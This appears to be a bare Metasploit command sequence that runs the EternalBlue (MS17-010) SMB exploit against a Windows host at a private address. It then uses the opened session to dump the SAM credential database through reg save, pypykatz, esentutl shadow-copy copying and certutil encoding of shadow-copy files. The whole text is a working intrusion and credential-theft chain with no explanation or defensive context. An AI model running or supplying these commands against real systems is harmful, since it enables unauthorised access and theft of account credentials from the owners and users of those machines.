use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.2.10
set LPORT 4545
exploit -z
sessions -c 'runas /user:blue reg save HKLM\sam %temp%\sam' -i 1
sessions -c 'runas /user:blue pypykatz live registry' -i 1
sessions -c 'runas /user:blue esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d %temp%/SAM' -i 1
sessions -c 'for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) && dir /B %temp%\SAMvss%a' -i 1
sessions -K
